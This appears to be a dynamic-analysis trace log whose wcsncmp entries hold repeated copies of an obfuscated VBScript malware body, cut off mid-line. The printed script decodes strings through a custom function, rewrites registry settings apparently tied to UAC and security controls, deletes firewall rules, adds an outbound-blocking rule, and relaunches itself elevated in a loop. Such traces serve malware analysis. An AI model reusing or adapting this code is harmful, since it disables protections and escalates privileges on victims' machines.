bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0222.994] wcsncmp (_String1="))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.994] wcsncmp (_String1=")\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.994] wcsncmp (_String1="\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0222.994] wcsncmp (_String1="\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.994] wcsncmp (_String1="Dim 